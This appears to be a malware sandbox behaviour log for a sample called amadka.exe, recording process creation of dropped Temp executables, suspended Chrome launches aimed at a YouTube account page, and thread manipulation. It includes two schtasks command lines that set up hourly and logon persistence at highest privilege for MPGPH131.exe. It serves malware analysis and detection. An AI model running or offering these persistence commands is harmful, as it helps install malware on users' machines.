CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 3988 thread_handle: 0x0000047c process_identifier: 3984 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\1000068001\servoces64.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004a0	1	1
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2268	1	0
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2708 thread_handle: 0x0000015c process_identifier: 2704 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000160	1	1
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2072 thread_handle: 0x00000168 process_identifier: 1152 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000164	1	1
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000001e0 suspend_count: 1 process_identifier: 2268	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x00000278 suspend_count: 1 process_identifier: 2380	1	0
CreateProcessInternalW June 15, 2024, 8:21 a.m.	thread_identifier: 2644 thread_handle: 0x0000029c process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a4	1	1
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2808	1	0
CreateProcessInternalW June 15, 2024, 8:13 a.m.	thread_identifier: 3012 thread_handle: 0x0000000000000098 process_identifier: 2752 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef43bf1e8,0x7fef43bf1f8,0x7fef43bf208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x000000000000009c	1	1
CreateProcessInternalW June 15, 2024, 8:13 a.m.	thread_identifier: 2124 thread_handle: 0x0000000000000144 process_identifier: 2120 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2644 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000148	1	1
NtResumeThread June 15, 2024, 8:13 a.m.	thread_handle: 0x00000000000001c0 suspend_count: 1 process_identifier: 2808	1	0
CreateProcessInternalW June 15, 2024, 8:14 a.m.	thread_identifier: 1668 thread_handle: 0x000000000000060c process_identifier: 1108 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1172,10468024286496660474,8520136674761711401,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=CB321EDECF782D156857DF85BE4265F2 --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000005e4	1	1
NtResumeThread June 15, 2024, 8:13 a.m.	thread_handle: 0x00000000000000dc suspend_count: 1 process_identifier: 2752	1	0
NtGetContextThread June 15, 2024, 8:14 a.m.	thread_handle: 0x0000000000000154	1	0
CreateProcessInternalW June 15, 2024, 8:14 a.m.	thread_identifier: 2684 thread_handle: 0x0000000000000084 process_identifier: 2688 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\1000005001\judit.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\onefile_776_133629000743281250\stub.exe stack_pivoted: 0 creation_flags: 32 (NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000000000000088	1	1
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1528	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 1528	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x0000018c suspend_count: 1 process_identifier: 1528	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000002fc suspend_count: 1 process_identifier: 1528	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 1528	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000003b0 suspend_count: 1 process_identifier: 1528	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000004d4 suspend_count: 1 process_identifier: 1528	1	0
NtGetContextThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1528	1	0
NtGetContextThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000e0	1	0
NtGetContextThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000e0	1	0
NtResumeThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 1528	1	0
NtGetContextThread June 15, 2024, 8:21 a.m.	thread_handle: 0x000000e0	1	0

amadka.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All